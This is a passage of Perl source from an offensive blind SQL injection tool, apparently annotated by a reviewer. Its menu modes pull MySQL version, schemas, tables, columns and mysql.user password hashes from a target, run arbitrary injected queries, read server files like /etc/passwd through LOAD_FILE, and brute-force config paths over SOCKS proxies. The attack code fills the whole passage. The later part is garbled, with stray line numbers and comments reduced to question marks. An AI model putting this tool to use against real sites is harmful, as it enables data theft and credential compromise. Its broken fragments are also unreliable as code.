  # $https_flag here; for plain http $host3 must already hold the host.
  if ($bl_url =~ m/^https:\/\/?([^\/]+)/i) {
     $host3 = $1;
     $https_flag = 1;
     print "----------------------\n";
     print "HTTPS mode enabled\n";
     print "----------------------\n";
  }
  $host = $host3;
  # One-time form login (HTTPS only).  The credentials come from the config
  # block at the top of the script and are POSTed to $https_auth_script_path;
  # the session cookie collected from the reply is kept in the shared $ck1 so
  # every worker thread reuses it.  $https_auth_check stops a second login.
  if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
      print "-----------------------------------------\n";
      print "Authorization required, wait please....";
      my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
      $ck1 = collect($answ1);
      $https_auth_check = 1;
      print " DONE\n";
      print "-----------------------------------------\n";
  }
     print $host . "\n";
  # SOCKS probe.  $query is the raw request socks_check() presumably sends
  # through each candidate proxy.
  # NOTE(review): $check_host is never assigned in this section while the
  # Referer is built from $check_url - verify which variable socks_check()
  # expects in the Host header.
  if ($use_socks == 1 && $socks_check == 0) {
    $check_url = $host;
    our $query = "GET / HTTP/1.$http_protocol\r\n"
             . "Host: $check_host\r\n"
             . "Referer: http://" . $check_url . "\r\n"
             . "Accept: */*\r\n"
             . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
             . "Connection: close\r\n\r\n";
     print "----------------------------------------\n";
     print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
     print "Timeout = 5 sec:\n";
     print "----------------------------------------\n";
     $socks_check = 0;
     $check_socks = socks_check();
    ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
    $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
    if ($current_proxy_host) {
       $socks_check = 1;
       print "Will use --> $proxy_message\n";
    } else {
       # NOTE(review): the message says "Exit..." but nothing exits - the menu
       # below is still shown and requests would go out without a SOCKS proxy.
       $socks_check = 0;
       $proxy_message = "No";
       print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
    }
  }
     # Blind-mode sub-menu; every mode below ends with "goto START10".
     START10:
     $schema_flag = 0;
     print "-----------------------------------------\n";
     print "Choose mode:\n";
     print "----------\n";
     print "    [1]  Blind System information\n";
     print "    [2]  Blind inj get DB-names from information_schema.schemata\n";
     print "    [3]  Blind inj get tables from DB-name\n";
     print "    [4]  <<< Blind ANY QUERY >>>\n";
     print "    [5]  Blind inj get column_name from tables from DB-name\n";
     print "    [6]  Blind inj get LOAD_FILE (file_priv = Y)\n";
     print "    [7]  Blind BRUTE LOAD_FILE log/conf files (file_priv = Y)\n";
     print "    [8]  Blind Get tables from information_schema (current DB)\n";
     print "    [9]  Blind Get column_name from table (current DB)\n";
     print "    [10] Blind Get data from columns\n";
     print "    [11] Blind Brute MySql4 for tables & columns\n";
     print "    [12] Main menu\n";
     print "----------\n";
     $choice = <STDIN>;
     chomp $choice;
     print "Your choice: $choice\n";
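  if ($choice==1) {
      # Blind mode 1: dump MySQL system information.
      # Each probe below is a SQL expression that len_check()/get_res_normal()
      # (defined elsewhere) wrap into the blind condition; the workers hand the
      # current probe and character position to those helpers through the
      # globals $bl_current, $bl_lenght and $ii, so those names must stay.
      # Everything recovered - including mysql.user hashes when that probe
      # succeeds - is appended in clear text to z_<host>.txt; treat the file
      # as sensitive.
      open( FILE1, ">>", "z_" . $host3 . ".txt" ) or warn "open z_$host3.txt: $!";
      print FILE1 "----------------------------------\n";
      print FILE1 "Blind MYsql system information:\n";
      print FILE1 "----------------------------------\n";
      # Probes (each is read as a scalar subquery on the target).
      $url1 = "version()";
      $url2 = "database()";
      $url3 = "user()";
      $url4 = "@@" . "basedir";              # split so "@basedir" is not interpolated
      $url5 = "@@" . "datadir";
      $url6 = "@@" . "tmpdir";
      $url7 = "@@" . "version_compile_os";
      # The next three need SELECT on mysql.user.
      $url8 = "user" . $bl_plus . "from" . $bl_plus . "mysql.user";
      # NOTE: mysql.user.password became authentication_string in MySQL 5.7;
      # on such servers this probe errors out and is skipped by the length check.
      $url9 = "password" . $bl_plus . "from" . $bl_plus . "mysql.user";
      # NOTE(review): "where user=user" compares the column with itself, so the
      # subquery returns every row; presumably the current account was meant -
      # left unchanged pending confirmation.
      $url10 = "file_priv" . $bl_plus ."from" . $bl_plus . "mysql.user" . $bl_plus . "where" . $bl_plus . "user=user";
      ####################
      $thr = $kol_threads;   # 0..$thr below starts $kol_threads+1 workers
      $num = -1;             # shared probe counter, advanced under lock by the workers
      $bl_lenght = "";
      $ii = 0;
      $mflag = 0;
      print "-----------------------------------\n";
      print "Request method - $method\n";
      print "Threads - $kol_threads\n";
      print "Proxy - $proxy_message\n";
      print "----------------------\n";
      $time = localtime;
      print $time . "\n";
      print "-----------------------------------\n";
      # Fix: the list used to end with the never-assigned $url0 instead of
      # $url10, so the file_priv probe was never sent and an empty one was.
      @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10);
      $size = @array;
      for(0..$thr) {
            $trl[$_] = threads->create(\&gets101);
      }
      for(0..$thr) {
            $trl[$_]->join;
      }
      # Worker: claim a probe index under the lock, read its length, then
      # extract it character by character (or through gets1000() when $mflag
      # is set - it is reset to 0 above, so only len_check()/len_check1()
      # could flip it inside the worker).
      sub gets101 {
           $| = 1;
           while ($num < $size) {
               # The previous code re-read $num after unlocking, so two workers
               # could run the same probe, and the last pass used $array[$size].
               my $idx;
               { lock($num); $idx = ++$num; }
               last if $idx >= $size;
               $bl_current = $array[$idx];
               $bl_lenght = ($bl_mode==0) ? len_check() : len_check1();
               if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
                    print $bl_current . " [length]:" .  $bl_lenght . "\n";
                    if ($mflag == 1) {
                        %aa = ();
                        $aa = gets1000();
                        $data1 = "";
                        for (sort {$a <=> $b} keys %$aa) { $data1 .= $aa->{$_}; }
                    } else {
                        $data1 = "";
                        for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                            $data1 .= chr(($bl_mode==0) ? get_res_normal() : get_res_normal1());
                            print $data1 . "\r";
                        }
                    }
                    print "\n------------------------------------------------------\n";
                    print "---> " . $bl_current . ": " . $data1 . "\n";
                    print "------------------------------------------------------\n";
                    print FILE1 $bl_current . ": " . $data1 . "\n";
               }
               sleep $pause;
           }
      }
      $time = localtime;
      print "\n" . $time . "\n";
      print "----------\n";
      print "Saved in " . "z_" . $host3 . ".txt\n";
      close(FILE1) or warn "close z_$host3.txt: $!";
      goto START10;
  }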
  2076. # Blind db names
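  if ($choice==2) {
      # Blind mode 2: enumerate schema names from information_schema.schemata.
      # Step 1 reads count(schema_name) digit by digit (get_res_count* read
      # the globals $bl_current, $bl_lenght and $ii); step 2 lets the worker
      # threads pull each "limit N,1" row and extract it character by
      # character.  Results are appended in clear text to z_<host>.txt.
      open( FILE1, ">>", "z_" . $host3 . ".txt" ) or warn "open z_$host3.txt: $!";
      print "-----------------------------------\n";
      ## count ##
      # Reset the digit buffer: the other blind modes do this, this one did
      # not, so a count left over from a previous mode got digits appended.
      $bl_table_number_NIS = "";
      $bl_lenght = "";
      $ii = 0;
      $bl_current = "(select" . $bl_plus .  "count(schema_name)" . $bl_plus . "from" . $bl_plus . "information_schema.schemata)";
      $bl_lenght = ($bl_mode==0) ? len_check() : len_check1();
      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
           print "Count DB in information_schema.schemata  [length]:" .  $bl_lenght . "\n";
           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                $bl_table_number_NIS .= ($bl_mode==0) ? get_res_count() : get_res_count1();
                print $bl_table_number_NIS . "\r";
                sleep $pause;
           }
           print "\n------------------------------------------------------\n";
           print "Count DB in information_schema.schemata [value]:" . $bl_table_number_NIS . "\n";
           print "--------------------------------------------------------\n";
      } else {
           print "\n------------------------------------------------------\n";
           print "Cant't get data...\n";
           print "------------------------------------------------------\n";
      }
      $time = localtime;
      print $time . "\n";
      print "-----------------------------------\n";
      ## start from2 ##
      print FILE1  "-----------------------------------------\n";
      print FILE1  "DB in information_schema.schemata - $bl_table_number_NIS\n";
      print FILE1  "-----------------------------------------\n";
      print "Normal MODE - records > 10\n";
      print "Fast MODE - records <= 10\n";
      print "-----------------------------------------\n";
      $thr = $kol_threads;   # 0..$thr starts $kol_threads+1 workers
      $num = -1;             # shared row counter, advanced under lock by the workers
      ## end from2
      print "Request method - $method\n";
      print "Threads - $kol_threads\n";
      print "Proxy - $proxy_message\n";
      print "----------------------\n";
      TABLES:
      $time = localtime;
      print $time . "\n";
      print "-----------------------------------\n";
      # extract each schema name #
      $bl_lenght = "";
      $ii = 0;
      $s = 0;
      $mflag = 0;
      print "-----------------------------------\n";
      for(0..$thr) {
          $trl[$_] = threads->create(\&gets102111);
      }
      for(0..$thr) {
          $trl[$_]->join;
      }
      # Worker: claim a row index under the lock (the previous code re-read
      # $num after unlocking, so two workers could fetch the same row while
      # another row was skipped), then read that row's length and characters.
      sub gets102111 {
         $| = 1;
         while ($num < $bl_table_number_NIS) {
             my $idx;
             { lock($num); $idx = ++$num; }
             last if $idx >= $bl_table_number_NIS;   # rows are 0..count-1
             $sss = $idx;
             $bl_current = "(select" . $bl_plus .  "schema_name" . $bl_plus . "from" . $bl_plus . "information_schema.schemata" . $bl_plus . "limit" . $bl_plus . $idx . ",1)";
             $bl_lenght = ($bl_mode==0) ? len_check() : len_check1();
             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
                  print "\nDB limit $sss,1 [length]:" .  $bl_lenght . "\n";
                  if ($mflag == 1) {
                      %aa = ();
                      $aa = gets1000();
                      $data1 = "";
                      for (sort {$a <=> $b} keys %$aa) { $data1 .= $aa->{$_}; }
                  } else {
                      $data1 = "";
                      for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                          $data1 .= chr(($bl_mode==0) ? get_res_normal() : get_res_normal1());
                          print $data1 . "\r";
                      }
                  }
                  print "\n-----------------------------------\n";
                  print "  ---> DB limit $sss,1: " . $data1 . "\n";
                  print "-----------------------------------\n";
                  print FILE1 "  ---> DB limit $sss,1: " . $data1 . "\n";
                  $data = "";
             }
             sleep $pause;
         }
     }
     print "----------\n";
     print "Saved in " . "z_" . $host3 . ".txt\n";
     close(FILE1) or warn "close z_$host3.txt: $!";
     goto START10;
  } # end DB names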
  2187. # Blind tables from DB names
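  if ($choice==3) {
      # Blind mode 3: list the tables of an operator-supplied schema.
      # The schema name is hex-encoded by ascii_to_hex() so the injected
      # subquery needs no quotes; the count is read digit by digit, then the
      # workers pull each "limit N,1" table_name character by character.
      open( FILE1, ">>", "z_" . $host3 . ".txt" ) or warn "open z_$host3.txt: $!";
      $bl_table_number_NIS = "";
      print "-----------------------------------------\n";
      print "Enter the DB-name: ";
      $choice = <STDIN>;
      chomp $choice;
      # NOTE(review): the backticks become part of the hex-encoded VALUE that
      # is compared with table_schema below, so a name containing '-' will not
      # match; identifier quoting only helps where the name is used as an
      # identifier.  Left unchanged pending confirmation of the intent.
      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
      print "DB-name: $choice\n";
      print "----------\n";
      # Explicit call: "ascii_to_hex $choice" is parsed as a method call on
      # $choice when the sub is not declared before this point.
      $choice1 = ascii_to_hex($choice);
      ## count ##
      $bl_lenght = "";
      $ii = 0;
      # NOTE: this query glues the value with $plus while the per-row query in
      # the worker uses $bl_plus; both kept as they were - verify they agree.
      $bl_current = "(select" . $bl_plus .  "count(table_name)" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema=" . $plus . $choice1 . ")";
      $bl_lenght = ($bl_mode==0) ? len_check() : len_check1();
      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
           # $tab_num1 is not assigned anywhere in this mode; it prints empty.
           print "Tables in DB [$choice]: $tab_num1 [length]:" .  $bl_lenght . "\n";
           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                $bl_table_number_NIS .= ($bl_mode==0) ? get_res_count() : get_res_count1();
                print $bl_table_number_NIS . "\r";
                sleep $pause;
           }
           print "\n------------------------------------------------------\n";
           print "Tables in DB [$choice]: $tab_num1 [value]:" . $bl_table_number_NIS . "\n";
           print "--------------------------------------------------------\n";
      } else {
           print "\n------------------------------------------------------\n";
           print "Cant't get data...\n";
           print "------------------------------------------------------\n";
      }
      $time = localtime;
      print $time . "\n";
      print "-----------------------------------\n";
      ## start from2 ##
      print FILE1  "-----------------------------------------\n";
      print FILE1  "Tables in DB [$choice]:- $bl_table_number_NIS\n";
      print FILE1  "-----------------------------------------\n";
      print "Normal MODE - records > 10\n";
      print "Fast MODE - records <= 10\n";
      print "-----------------------------------------\n";
      $thr = $kol_threads;   # 0..$thr starts $kol_threads+1 workers
      $num = -1;             # shared row counter, advanced under lock by the workers
      ## end from2
      print "Request method - $method\n";
      print "Threads - $kol_threads\n";
      print "Proxy - $proxy_message\n";
      print "----------------------\n";
      TABLES:
      $time = localtime;
      print $time . "\n";
      print "-----------------------------------\n";
      # extract each table name #
      $bl_lenght = "";
      $ii = 0;
      $s = 0;
      $mflag = 0;
      print "-----------------------------------\n";
      for(0..$thr) {
          $trl[$_] = threads->create(\&gets109999);
      }
      for(0..$thr) {
          $trl[$_]->join;
      }
      # Worker: claim a row index under the lock (the previous code re-read
      # $num after unlocking, so two workers could fetch the same row while
      # another was skipped), then read that row's length and characters.
      sub gets109999 {
         $| = 1;
         while ($num < $bl_table_number_NIS) {
             my $idx;
             { lock($num); $idx = ++$num; }
             last if $idx >= $bl_table_number_NIS;   # rows are 0..count-1
             $sss = $idx;
             $bl_current = "(select" . $bl_plus .  "table_name" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema=" . $bl_plus . $choice1 . $bl_plus . "limit" . $bl_plus . $idx . ",1)";
             $bl_lenght = ($bl_mode==0) ? len_check() : len_check1();
             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
                  print "\nTable limit $sss,1 [length]:" .  $bl_lenght . "\n";
                  if ($mflag == 1) {
                      %aa = ();
                      $aa = gets1000();
                      $data1 = "";
                      for (sort {$a <=> $b} keys %$aa) { $data1 .= $aa->{$_}; }
                  } else {
                      $data1 = "";
                      for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                          $data1 .= chr(($bl_mode==0) ? get_res_normal() : get_res_normal1());
                          print $data1 . "\r";
                      }
                  }
                  print "\n-----------------------------------\n";
                  print "  ---> Table limit $sss,1: " . $data1 . "\n";
                  print "-----------------------------------\n";
                  print FILE1 "  ---> Table limit $sss,1: " . $data1 . "\n";
                  $data = "";
             }
             sleep $pause;
         }
     }
     print "----------\n";
     print "Saved in " . "z_" . $host3 . ".txt\n";
     close(FILE1) or warn "close z_$host3.txt: $!";
     goto START10;
  } # end tables from DB names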
  2306. #######################################################################################################################################################################################
  2307. # Blind some query
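  if ($choice==4) {
      # Blind mode 4: run an arbitrary operator-supplied expression.
      # $choice100 is the SELECT expression, $choice200 the FROM/WHERE tail;
      # both are spliced verbatim into the injected subquery (this is the
      # tool's purpose - it sends whatever the operator types to the target,
      # so use it only against systems you are authorised to test).
      # count(...) of the expression is read first, then each "limit N,1" row.
      open( FILE1, ">>", "z_" . $host3 . ".txt" ) or warn "open z_$host3.txt: $!";
      $bl_table_number_NIS = "";
      $choice100 =  "";
      $choice200 =  "";
      $choice300 = "";
      # Config-level $bl_your_query/$bl_from take precedence over the prompt.
      if(!$bl_your_query) {
         print "\$bl_your_query is empty in code\n";
         print "Enter your query, example - concat_ws(0x3a,table_schema,table_name)\n\n";
         $choice100 = <STDIN>;
         chomp  $choice100;
         print "\n\nEnter condition, without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+like+0x7573657273 (if NOT- press ENTER):\n\n";
         $choice200 = <STDIN>;
         chomp  $choice200;
      } else {
         $choice100 =  $bl_your_query;
         $choice200 =  $bl_from;
      }
      $choice300 = $choice100 . $choice200;   # not read in this mode; kept for code outside this block
      print "---------------------------------------------------------------------------------------------------------------------------------------\n";
      print "your query: (select(". $choice100 . ")" . $choice200 . ")\n";
      print "---------------------------------------------------------------------------------------------------------------------------------------\n";
      $bl_lenght = "";
      $ii = 0;
      $bl_current = "(select(count(" . $choice100 . "))" . $choice200 . ")";
      $bl_lenght = ($bl_mode==0) ? len_check() : len_check1();
      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
           print "Count records for your answer[length]:" .  $bl_lenght . "\n";
           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                $bl_table_number_NIS .= ($bl_mode==0) ? get_res_count() : get_res_count1();
                print $bl_table_number_NIS . "\r";
                sleep $pause;
           }
           print "\n------------------------------------------------------\n";
           print "Count records for your answer[value]:" . $bl_table_number_NIS . "\n";
           print "--------------------------------------------------------\n";
      } else {
           print "\n------------------------------------------------------\n";
           print "Cant't get data...\n";
           print "------------------------------------------------------\n";
      }
      ## rows ##
      $time = localtime;
      print $time . "\n";
      print "-----------------------------------\n";
      $thr = $kol_threads;   # 0..$thr starts $kol_threads+1 workers
      # A single row is fetched without LIMIT, so the counter starts at 0 and
      # the worker runs exactly once with $sss == 1; otherwise rows 0..count-1.
      if($bl_table_number_NIS == 1) {
         $num = 0;
      } else {$num = -1}
      print "Request method - $method\n";
      print "Threads - $kol_threads\n";
      print "Proxy - $proxy_message\n";
      print "----------------------\n";
      $bl_lenght = "";
      $ii = 0;
      $s = 0;
      $mflag = 0;
      print "-----------------------------------\n";
      for(0..$thr) {
          $trl[$_] = threads->create(\&gets102222);
      }
      for(0..$thr) {
          $trl[$_]->join;
      }
      # Worker: claim a row index under the lock (the previous code re-read
      # $num after unlocking, so two workers could fetch the same row while
      # another was skipped), then read that row's length and characters.
      sub gets102222 {
         $| = 1;
         while ($num < $bl_table_number_NIS) {
             my $idx;
             { lock($num); $idx = ++$num; }
             # Multi-row case only: valid rows are 0..count-1.
             last if $bl_table_number_NIS > 1 && $idx >= $bl_table_number_NIS;
             $sss = $idx;
             if ($bl_table_number_NIS>1){
                $bl_current = "(select(" . $choice100 . ")" . $choice200 . $bl_plus . "limit" . $bl_plus . $idx . ",1)";
             } else {
                $bl_current = "(select(" . $choice100 . ")" . $choice200 . ")";
             }
             $bl_lenght = ($bl_mode==0) ? len_check() : len_check1();
             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
                  print "\nAnswer[length]:" .  $bl_lenght . "\n";
                  if ($mflag == 1) {
                      %aa = ();
                      $aa = gets1000();
                      $data1 = "";
                      for (sort {$a <=> $b} keys %$aa) { $data1 .= $aa->{$_}; }
                  } else {
                      $data1 = "";
                      for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                          $data1 .= chr(($bl_mode==0) ? get_res_normal() : get_res_normal1());
                          print $data1 . "\r";
                      }
                  }
                  print "\n-----------------------------------\n";
                  print " Answer limit $sss,1 --->  " . $data1 . "\n";
                  print "-----------------------------------\n";
                  print FILE1 " Answer limit $sss,1 ---> " . $data1 . "\n";
                  $data = "";
             }
             sleep $pause;
         }
     }
     print "----------\n";
     print "Saved in " . "z_" . $host3 . ".txt\n";
     close(FILE1) or warn "close z_$host3.txt: $!";
     goto START10;
  } # end some query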
  2430. #########################################################################################################################################################
  2431. # Blind columns from tables from DB names
  2432. if ($choice==5) {
  2433.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2434.      $bl_table_number_NIS = "";
  2435.      print "-----------------------------------------\n";
  2436.      print "Enter the DB-name: ";
  2437.      $choice = <STDIN>;
  2438.      chomp $choice;
  2439.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  2440.      print "DB-name: $choice\n";
  2441.      print "----------\n";
  2442.      $choice1 = ascii_to_hex $choice;
  2443.      print "-----------------------------------------\n";
  2444.      print "Enter the TABLE-name: ";
  2445.      $choice2 = <STDIN>;
  2446.      chomp $choice2;
  2447.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
  2448.      print "TABLE-name: $choice2\n";
  2449.      print "----------\n";
  2450.      $choice3 = ascii_to_hex $choice2;
  2451.      ## ???????? ##
  2452.      $bl_lenght = "";
  2453.      $ii = 0;
  2454.      $bl_current = "(select" . $bl_plus .  "count(column_name)" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $choice3 . $bl_plus . "and" . $bl_plus . "table_schema=" . $plus . $choice1 . ")";
  2455.             if ($bl_mode==0) {
  2456.                    $bl_lenght = len_check();
  2457.             } else {
  2458.                    $bl_lenght = len_check1();
  2459.             }
  2460.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2461.           print "Columns in [$choice.$choice2] [length]:" .  $bl_lenght . "\n";
  2462.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2463.                if ($bl_mode==0) {
  2464.                    $bl_table_number_NIS .= get_res_count();
  2465.                } else {
  2466.                    $bl_table_number_NIS .= get_res_count1();
  2467.                }
  2468.                 print $bl_table_number_NIS . "\r";
  2469.                 sleep $pause;
  2470.           }
  2471.           print "\n------------------------------------------------------\n";
  2472.           print "Columns in [$choice.$choice2] [value]:" . $bl_table_number_NIS . "\n";
  2473.           print "--------------------------------------------------------\n";
  2474.      } else {
  2475.           print "\n------------------------------------------------------\n";
  2476.           print "Cant't get data...\n";
  2477.           print "------------------------------------------------------\n";
  2478.      }
  2479.      $time = localtime;
  2480.      print $time . "\n";
  2481.      print "-----------------------------------\n";
  2482.      ## start from2 ##
  2483.      print FILE1  "-----------------------------------------\n";
  2484.      print FILE1  "Columns in [$choice.$choice2]: - $bl_table_number_NIS\n";
  2485.      print FILE1  "-----------------------------------------\n";
  2486.      print "Normal MODE - records > 10\n";
  2487.      print "Fast MODE - records <= 10\n";
  2488.      print "-----------------------------------------\n";
  2489.      $thr = $kol_threads; # ???-?? ???????
  2490.      $num = -1; # ?? ????????
  2491.      ## end from2
  2492.      print "Request method - $method\n";
  2493.      print "Threads - $kol_threads\n";
  2494.      print "Proxy - $proxy_message\n";
  2495.      print "----------------------\n";
  2496.      TABLES:
  2497.      $time = localtime;
  2498.      print $time . "\n";
  2499.      print "-----------------------------------\n";
  2500.      # ?????? DB #
  2501.      $bl_lenght = "";
  2502.      $ii = 0;
  2503.      $s = 0;
  2504.      $mflag = 0;
  2505.      print "-----------------------------------\n";
  2506.      for(0..$thr) {
  2507.          $trl[$_] = threads->create(\&gets102333);
  2508.      }
  2509.      for(0..$thr) {
  2510.          $trl[$_]->join;
  2511.      }
  2512.      sub gets102333 {
  2513.         $| = 1;
  2514.         while ($num < $bl_table_number_NIS) {
  2515.             { lock($num);
  2516.             $num++; }
  2517.             $sss = $num;
  2518.             $bl_current = "(select" . $bl_plus .  "column_name" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $choice3 . $bl_plus . "and" . $bl_plus . "table_schema=" . $plus . $choice1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2519.             if ($bl_mode==0) {
  2520.                    $bl_lenght = len_check();
  2521.             } else {
  2522.                    $bl_lenght = len_check1();
  2523.             }
  2524.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2525.                  print "\nColumn limit $sss,1 [length]:" .  $bl_lenght . "\n";
  2526.                  if ($mflag == 1) {
  2527.                      ############################################################
  2528.                      %aa = ();
  2529.                      $aa = gets1000();
  2530.                      $data1 = "";
  2531.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2532.                      #############################################################
  2533.                  } else {
  2534.                    $data1 = "";
  2535.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2536.                     if ($bl_mode==0) {
  2537.                          $data1 .= chr(get_res_normal());
  2538.                     } else {
  2539.                          $data1 .= chr(get_res_normal1());
  2540.                     }
  2541.                       print $data1 . "\r";
  2542.                    }
  2543.                  }
  2544.                  print "\n-----------------------------------\n";
  2545.                  print "  ---> Column limit $sss,1: " . $data1 . "\n";
  2546.                  print "-----------------------------------\n";
  2547.                  print FILE1 "  ---> Column limit $sss,1: " . $data1 . "\n";
  2548.                  $data = "";
  2549.             }
  2550.             sleep $pause;
  2551.         }
  2552.     }
  2553.     print "----------\n";
  2554.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2555.     close(FILE1);
  2556.     goto START10;
  2557. } # end columns from tables from DB names
  2558. # blind LOAD_FILE log/conf BRUTE
  2559. if ($choice==7) {
  2560.        open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2561.        $bl_lenght=0;  
  2562.        print "   Brute log/conf files\n";
  2563.        print "   -------------\n";
  2564.        print FILE1 "   Brute log/conf files\n";
  2565.        print FILE1 "   -------------\n";
  2566.        open(FILE, "<", $lrl_list);
  2567.        while(<FILE>) {
  2568.          chomp;
  2569.          push(@lrl_list, $_);
  2570.        }
  2571.        close(FILE);
  2572.        $size = 0;
  2573.        $size = @lrl_list;
  2574.        print "File: $lrl_list\n";
  2575.        print "Paths: $size\n";
  2576.        print "-------------\n";
  2577.        print "Request method - $method\n";
  2578.        print "Threads - $kol_threads\n";
  2579.        print "Proxy - $proxy_message\n";
  2580.        print "----------------------\n";
  2581.        $thr = $kol_threads; # ???-?? ???????
  2582.        $num = -1; # ?? ????????
  2583.        for(0..$thr) {
  2584.             $trl[$_] = threads->create(\&gets996655);
  2585.        }
  2586.        for(0..$thr) {
  2587.             $trl[$_]->join;
  2588.        }
  2589.        sub gets996655 {
  2590.             $| = 1;
  2591.             while ($num<$size) {
  2592.                { lock($num);
  2593.                $num++; }
  2594.                $choice1111  = '/'.$lrl_list[$num];
  2595.                $choice2222 = ascii_to_hex $choice1111;
  2596.                print $choice1111 . "\n";
  2597.                $bl_lenght = "";
  2598.                $bl_current = "length(load_file(" . $choice2222 .  "))";
  2599.                if ($bl_mode==0) {
  2600.                    $bl_lenght = len_check();
  2601.                } else {
  2602.                    $bl_lenght = len_check1();
  2603.                }
  2604.                if  (($bl_lenght >= 2)) {
  2605.                     print "   ---> " . $choice1111 . "\n";
  2606.                     print FILE1 "  "  . $choice1111 . "\n";
  2607.                }
  2608.                $bl_lenght=0;
  2609.                print $num . "\r";
  2610.                sleep $pause;
  2611.  
  2612.             }
  2613.        }
  2614.     print "----------\n";
  2615.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2616.     close(FILE1);
  2617.     goto START10;
  2618. } # end blind LOAd_FILE BRUTE
  2619. # blind LOAd_FILE
  2620. if ($choice==6) {
  2621.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2622.      $bl_table_number_NIS = "";
  2623.      print "-----------------------------------------\n";
  2624.      print "Enter file name (example: /etc/passwd): ";
  2625.      $choice = <STDIN>;
  2626.      chomp $choice;
  2627.      print "File name for read: $choice\n";
  2628.      $choice1 = ascii_to_hex $choice;
  2629.      ## ???????? ##
  2630.      $bl_lenght = "";
  2631.      $ii = 0;
  2632.      $bl_current = "length(load_file(" . $choice1 .  "))";
  2633.             if ($bl_mode==0) {
  2634.                    $bl_lenght = len_check();
  2635.             } else {
  2636.                    $bl_lenght = len_check1();
  2637.             }
  2638.      if  (($bl_lenght >= 2)) {
  2639.           print "File [$choice] size [length]:" .  $bl_lenght . "\n";
  2640.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2641.                if ($bl_mode==0) {
  2642.                    $bl_table_number_NIS .= get_res_count();
  2643.                } else {
  2644.                    $bl_table_number_NIS .= get_res_count1();
  2645.                }
  2646.                 print $bl_table_number_NIS . "\r";
  2647.                 sleep $pause;
  2648.           }
  2649.           print "\n------------------------------------------------------\n";
  2650.           print "File [$choice] size: - $bl_table_number_NIS bytes\n";
  2651.           print "--------------------------------------------------------\n";
  2652.      } else {
  2653.           print "\n------------------------------------------------------\n";
  2654.           print "Cant't get data...\n";
  2655.           print "------------------------------------------------------\n";
  2656.           close(FILE1);
  2657.           goto START10;
  2658.      }
  2659.      $time = localtime;
  2660.      print $time . "\n";
  2661.      ## start from2 ##
  2662.      print FILE1  "-----------------------------------------\n";
  2663.      print FILE1  "File [$choice] size: - $bl_table_number_NIS bytes\n";
  2664.      print FILE1  "-----------------------------------------\n";
  2665.      # ?????? ???? #
  2666.      $thr = $kol_threads; # ???-?? ???????
  2667.      $num = -1; # ?? ????????
  2668.      ## end from2
  2669.      print "Request method - $method\n";
  2670.      print "Threads - $kol_threads\n";
  2671.      print "Proxy - $proxy_message\n";
  2672.      print "----------------------\n";
  2673.      TABLES:
  2674.      $time = localtime;
  2675.      print $time . "\n";
  2676.      print "-----------------------------------\n";
  2677.      # ?????? DB #
  2678.      $bl_lenght = "";
  2679.      $ii = 0;
  2680.      $s = 0;
  2681.      $mflag = 0;
  2682.      print "-----------------------------------\n";
  2683.      $bl_current = "(load_file(" . $choice1 .  "))";
  2684.      %aa = ();
  2685.      $aa = load_file();
  2686.      $data1000 = "";
  2687.      $data1000 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2688.      print FILE1 $data1000;
  2689.      sub load_file {
  2690.          $thr = $kol_threads; # ???-?? ???????
  2691.          print "Get ALL file ($bl_table_number_NIS) or PART of file ? (1/0): ";
  2692.          $choice = <STDIN>;
  2693.          chomp $choice;
  2694.          if ($choice == 1) {
  2695.              $num = -1; # ?? ????????
  2696.          } else {
  2697.              print "Enter START byte: ";
  2698.              $choice1 = <STDIN>;
  2699.              chomp $choice1;
  2700.              $num = $choice1-2;
  2701.              print "Enter END byte: ";
  2702.              $choice2 = <STDIN>;
  2703.              chomp $choice2;
  2704.              $bl_table_number_NIS = $choice2;
